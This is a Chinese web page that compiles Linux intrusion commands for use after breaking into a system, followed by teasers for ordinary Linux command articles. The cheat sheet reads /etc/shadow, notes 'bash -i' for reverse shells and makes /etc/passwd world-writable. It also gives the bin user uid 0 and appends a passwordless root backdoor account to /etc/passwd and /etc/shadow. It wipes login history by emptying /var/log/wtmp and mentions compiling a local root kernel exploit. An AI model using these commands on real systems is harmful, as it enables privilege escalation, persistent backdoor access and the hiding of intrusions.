linux 入侵常用命令汇编

cat /etc/passwd 查看linux用户

  cat /etc/shadow 查看用户密码需要root权限

  cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息

  ifconfig 查看本机ip信息

  cat /etc/resolv.conf 查看DNS信息

  bash -i 在反弹的shell中使用可以直观显示命令

  bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成

  bash#。

  系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。

  echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

  vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

  netstat -an |grep LISTEN |grep :80 查看端口

  service --status-all | grep running

  service --status-all | grep http

  查看运行服务

  lsb_release -a 查看系统版本

  重启ssh服务 :/usr/sbin/sshd stop

  /usr/sbin/sshd start

  ssd_config文件里

  PasswordAuthentication no,

  将其改为

  PasswordAuthentication yes

  远程ssh才可登录

  否则显示Access denied

  其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

  su的菜鸟用法

  先chomod 777 /etc/passwd

  然后修改bin用户的gid和uid为0

  然后passwd设置bin的密码

  然后cp /bin/bash /sbin/nologin

  然后su的时候su - bin就可以到rootshell了。

  这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

  还可以这样

  sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

  gcc prtcl2.c –o local –static –Wall

  echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

  echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

  清空last记录 cp /dev/null /var/log/wtmp

  -----

  dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

(0)

相关推荐

  • 你可能会用到的16个Linux命令

    前言 我们每天都会频繁使用Linux命令行,虽然网上关于其使用技巧的资料多种多样,但很多朋友应该并没有进行过实际尝试.因此,今天的文章将对此进行汇总,希望能为大家带来一点帮助. 1. 将输出结果显示为表 有时候,当我们查看命令的输出结果时,大量拥护的字符串可能很难进行阅读.如果将命令整理为表?其实非常简单!只需要输入: mount | column –t: 在以上示例中,输出结果因为被空格隔开而显得非常清晰.那么,如果分隔符是冒号或者其它符号(例如cat /etc/passwd)又该怎么办? 只

  • 开发人员必知的8个常用linux命令

    我们以一些文本举例.假设我们有2个文件,里面有订单关于第三方的放置地点和发送回应.cat order.out.log8:22:19 111, 1, Patterns of Enterprise Architecture, Kindle edition, 39.998:23:45 112, 1, Joy of Clojure, Hardcover, 29.998:24:19 113, -1, Patterns of Enterprise Architecture, Kindle edition,

  • 很实用的Linux 系统运维常用命令及常识(超实用)

    作为Linux运维,需要了解Linux操作系统的基本使用和管理知识,下面我们小编给大家介绍下Linux运维需要掌握的命令,想成为Linux运维的朋友可以来学习一下. 1 文件管理2 软件管理3 系统管理 4 服务管理5 网络管理6 磁盘管理 7 用户管理8 脚本相关9 服务配置 ================================== ---------------------------------- 1 文件管理 ---------------------------------

  • Linux的常用网络命令

    计算机网络的主要优点是能够实现资源和信息的共享,并且用户可以远程访问信息. Linux提供了一组强有力的网络命令来为用户服务,这些工具能够帮助用户登录到远程计算机上.传输文件和执行远程命令等.介绍下列几个常用的有关网络操作的命令: ftp 传输文件 telnet 登录到远程计算机上 r - 使用各种远程命令 netstat 查看网络的状况 nslookup 查询域名和IP地址的对应 finger 查询某个使用者的信息 ping 查询某个机器是否在工作 使用ftp命令进行远程文件传输 ftp命令是

  • Linux 中 CURL常用命令详解

    下载单个文件,默认将输出打印到标准输出中(STDOUT)中 curl http://www.centos.org 通过-o/-O选项保存下载的文件到指定的文件中: -o:将文件保存为命令行中指定的文件名的文件中 -O:使用URL中默认的文件名保存文件到本地 # 将文件下载到本地并命名为mygettext.html curl -o mygettext.html http://www.gnu.org/software/gettext/manual/gettext.html # 将文件保存到本地并命名

  • Linux 常用命令大全(经典)

    Linux下常用指令大全cat cdchmod chowncp cut名称:cat使用权限:所有使用者使用方式:cat [-AbeEnstTuv] [--help] [--version] fileName说明:把档案串连接后传到基本输出(萤幕或加 > fileName 到另一个档案)参数:-n-b-s-v或或或或--number 由 1 开始对所有输出的行数编号--number-nonblank 和 -n 相似,只不过对于空白行不编号--squeeze-blank 当遇到有连续两行以上的空白行

  • 积累linux常用命令大全

    本人记忆力有限,就把平时在项目中遇到的linux常用命令分享给大家. Linux常用命令全集 http://www.jb51.net/linux/ linux文件中存在^M 使用shell命令tr可以实现去除,具体命令如下: 复制代码 代码如下: cat -v yourfile | tr -d "^M" > targetfile VIM中选定某个单词 在ESC之后,使用w或者wi或者vwi可以选择某个单词 在控制台中快速移动光标 1.删除 1.1 ctrl + d 删除光标所在位

  • linux shell命令的常用快捷键

    Ctrl + a 切换到命令行开始 Ctrl + e 切换到命令行末尾 Ctrl + l 清除屏幕内容 Ctrl + u 清除剪切光标之前的内容 Ctrl + k 剪切清除光标之后的内容 Ctrl + y 复制剪切板里的内容 Ctrl + h 类似于退格键 Ctrl + r 在历史命令中查找 (这个非常好用,输入关键字就调出以前的命令了) Ctrl + c 终止命令 Ctrl + d 退出shell Ctrl + z 转入后台运行.. alt键比较少用,因为很多地方与远程登陆工具是有冲突的..

  • Linux系统信息查看常用命令

    系统 # uname -a               # 查看内核/操作系统/CPU信息# head -n 1 /etc/issue   # 查看操作系统版本# cat /proc/cpuinfo      # 查看CPU信息# hostname               # 查看计算机名# lspci -tv              # 列出所有PCI设备# lsusb -tv              # 列出所有USB设备# lsmod                  # 列出加载

  • LINUX入门级常用命令20条整理

    1. man 对你熟悉或不熟悉的命令提供帮助解释eg:man ls 就可以查看ls相关的用法 2. ls 查看目录或者文件 3. cp 拷贝文件 4. rm 删除文件和目录 5. mv 移走目录或者改文件名 6. cd 改变当前目录 pwd 查看当前所在目录完整路径 7. cat,more命令将某个文件的内容显示出来. 8.chmod 命令 权限修改 用法:chmod 一位8进制数 filename. 9. clear,date命令:clear:清屏,相当与DOS下的cls;date:显示当前时

随机推荐